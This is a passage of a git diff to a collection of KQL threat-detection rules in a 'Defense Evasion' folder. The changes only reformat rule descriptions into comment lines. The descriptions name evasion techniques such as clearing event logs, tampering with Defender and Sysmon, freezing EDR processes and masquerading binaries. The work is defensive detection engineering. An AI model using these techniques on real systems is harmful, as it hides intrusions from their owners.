view and manipulate processes, kernel options and other low level options. +// Threat actors abused older vulnerable versions to manipulate system processes. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543 // False Positives: diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql index 6ed4cedb..3d3c5926 100644 --- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql +++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql @@ -3,8 +3,7 @@ // Date: 2023-08-22 // Level: high // Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. -Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. - +// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql index 4c02c568..c6146bf3 100644 --- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql +++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql @@ -3,8 +3,7 @@ // Date: 2024-08-23 // Level: high // Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. -Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. - +// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql index 7a42b235..dda31efe 100644 --- a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql +++ b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql @@ -3,9 +3,8 @@ // Date: 2020-05-03 // Level: low // Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. -Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables. -Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures. - +// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables. +// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1027.002 // False Positives: diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql index c11f7694..f9247303 100644 --- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql +++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql @@ -3,8 +3,7 @@ // Date: 2022-08-06 // Level: high // Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc - +// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.t1112 // False Positives: diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql index a6cde613..0d23e690 100644 --- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql +++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql @@ -3,8 +3,7 @@ // Date: 2022-09-29 // Level: medium // Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. - +// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.t1112 // False Positives: diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql index e7d6a322..b8ed369a 100644 --- a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql +++ b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql @@ -3,8 +3,7 @@ // Date: 2025-06-04 // Level: low // Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity. -Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag. - +// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.009 // False Positives: diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql index ec27779c..28938509 100644 --- a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql +++ b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql @@ -3,7 +3,6 @@ // Date: 2020-10-05 // Level: medium // Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql index ff46027a..fd65b999 100644 --- a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql +++ b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql @@ -3,8 +3,7 @@ // Date: 2022-09-15 // Level: medium // Description: Detects usage of the 'crontab' utility to remove the current crontab. -This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible - +// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql index 29d72669..d15ceab3 100644 --- a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql @@ -3,8 +3,7 @@ // Date: 2019-11-18 // Level: high // Description: Detects the execution of a renamed ProcDump executable. -This often done by attackers or malware in order to evade defensive mechanisms. - +// This often done by attackers or malware in order to evade defensive mechanisms. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.003 // False Positives: diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql index c1d66e6c..982770ca 100644 --- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql +++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql @@ -3,9 +3,8 @@ // Date: 2025-09-25 // Level: high // Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog. -In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. -Adversaries may delete this key to cover their tracks after executing commands. - +// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. +// Adversaries may delete this key to cover their tracks after executing commands. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.003 diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql index 21243bfb..b44d889b 100644 --- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql +++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql @@ -3,9 +3,8 @@ // Date: 2025-09-25 // Level: high // Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. -In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. -Adversaries may delete this key to cover their tracks after executing commands. - +// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. +// Adversaries may delete this key to cover their tracks after executing commands. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.003 diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql index 8800d03f..0328c4af 100644 --- a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql @@ -3,8 +3,7 @@ // Date: 2024-02-05 // Level: high // Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. -This behavior has been observed in-the-wild by different threat actors. - +// This behavior has been observed in-the-wild by different threat actors. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql index 6cb1c1f4..6c230635 100644 --- a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql @@ -3,9 +3,8 @@ // Date: 2024-02-05 // Level: medium // Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. -These files are used by the "iexpress.exe" utility in order to create self extracting packages. -Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. - +// These files are used by the "iexpress.exe" utility in order to create self extracting packages. +// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql index 681835b2..3e47c582 100644 --- a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql +++ b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-06-28 // Level: high // Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1564.001 diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql index 67e98b86..2344db98 100644 --- a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql @@ -3,8 +3,7 @@ // Date: 2025-10-18 // Level: high // Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes. -Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking. - +// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql index 506c97ea..11de8336 100644 --- a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql +++ b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql @@ -3,7 +3,6 @@ // Date: 2019-02-09 // Level: high // Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036 diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql index 19e22c22..0e46bca3 100644 --- a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql +++ b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql @@ -3,8 +3,7 @@ // Date: 2020-07-03 // Level: medium // Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. -Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. - +// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.003 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql index 87f4b733..76cfacf8 100644 --- a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql @@ -3,7 +3,6 @@ // Date: 2022-08-19 // Level: high // Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1216 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql index 9c7bc5b3..9255b130 100644 --- a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql +++ b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql @@ -3,8 +3,7 @@ // Date: 2019-09-26 // Level: high // Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". -This technique were seen used by threat actors and ransomware strains in order to evade defenses. - +// This technique were seen used by threat actors and ransomware strains in order to evade defenses. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql index 806398c0..5b5bfe00 100644 --- a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql +++ b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql @@ -3,8 +3,7 @@ // Date: 2022-09-05 // Level: high // Description: Detect creation of suspicious executable file names. -Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. - +// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1564 diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql index bf8df16e..1bdd6395 100644 --- a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql +++ b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql @@ -3,7 +3,6 @@ // Date: 2022-11-07 // Level: medium // Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.007 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql index 142dc056..c104c74f 100644 --- a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql @@ -3,8 +3,7 @@ // Date: 2022-01-16 // Level: medium // Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. -Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) - +// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.007 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql index c10a7be9..d896dce7 100644 --- a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql +++ b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql @@ -3,9 +3,8 @@ // Date: 2023-11-21 // Level: high // Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. -Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. -IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. - +// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. +// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql index ce814bbd..1d716247 100644 --- a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-08-07 // Level: high // Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. -Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. - +// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.005 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql index 0007595c..9a592f94 100644 --- a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql +++ b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql @@ -3,7 +3,6 @@ // Date: 2025-09-23 // Level: high // Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql index b0422cb6..a85047d3 100644 --- a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql +++ b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql @@ -3,8 +3,7 @@ // Date: 2019-04-08 // Level: medium // Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. -This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. - +// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. // MITRE Tactic: Defense Evasion // Tags: attack.t1562.001, attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/Defense Evasion/suspicious_service_installed.kql index 439ddb56..12a796f6 100644 --- a/KQL/rules/Defense Evasion/suspicious_service_installed.kql +++ b/KQL/rules/Defense Evasion/suspicious_service_installed.kql @@ -3,8 +3,7 @@ // Date: 2019-04-08 // Level: medium // Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. -Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) - +// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) // MITRE Tactic: Defense Evasion // Tags: attack.t1562.001, attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql index d1ea84e1..a7fe1b13 100644 --- a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql +++ b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql @@ -3,8 +3,7 @@ // Date: 2024-12-01 // Level: high // Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. -Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. - +// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.011 diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql index 56279558..0e879f4f 100644 --- a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql +++ b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql @@ -3,8 +3,7 @@ // Date: 2025-10-23 // Level: high // Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes. -Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking. - +// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql index 75d606c8..0bc2610c 100644 --- a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql +++ b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql @@ -3,7 +3,6 @@ // Date: 2025-08-22 // Level: high // Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql index a7a9987a..9f4eb0a1 100644 --- a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql +++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql @@ -3,9 +3,8 @@ // Date: 2021-07-07 // Level: high // Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. -It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts. -The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity. - +// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts. +// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.impact, attack.t1490 diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql index 3e986e69..534e2f08 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-03-22 // Level: high // Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql index 6a22e04a..b3fcbcbd 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql @@ -3,7 +3,6 @@ // Date: 2022-09-01 // Level: high // Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql index 001bb487..cdc0a124 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql @@ -3,7 +3,6 @@ // Date: 2022-02-26 // Level: high // Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036 diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql index 092d7cfc..41be0cce 100644 --- a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql +++ b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql @@ -3,8 +3,7 @@ // Date: 2023-07-12 // Level: medium // Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. -This might indicate potential process injection activity from a beacon or similar mechanisms. - +// This might indicate potential process injection activity from a beacon or similar mechanisms. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.command-and-control // False Positives: diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql index 6b453a5d..8ac7a924 100644 --- a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql +++ b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql @@ -3,7 +3,6 @@ // Date: 2021-10-15 // Level: high // Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.002 // False Positives: diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql index 5a9e25de..f305d2d9 100644 --- a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql +++ b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql @@ -3,8 +3,7 @@ // Date: 2022-07-28 // Level: high // Description: Detects changes in Sysmon driver altitude value. -If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. - +// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql index bf4db1ad..a581c612 100644 --- a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql +++ b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql @@ -3,7 +3,6 @@ // Date: 2017-11-27 // Level: high // Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036 diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql index d4c7f2bf..10f3b51e 100644 --- a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql +++ b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql @@ -3,8 +3,7 @@ // Date: 2024-05-27 // Level: medium // Description: Detects the execution of "sysctl" with specific 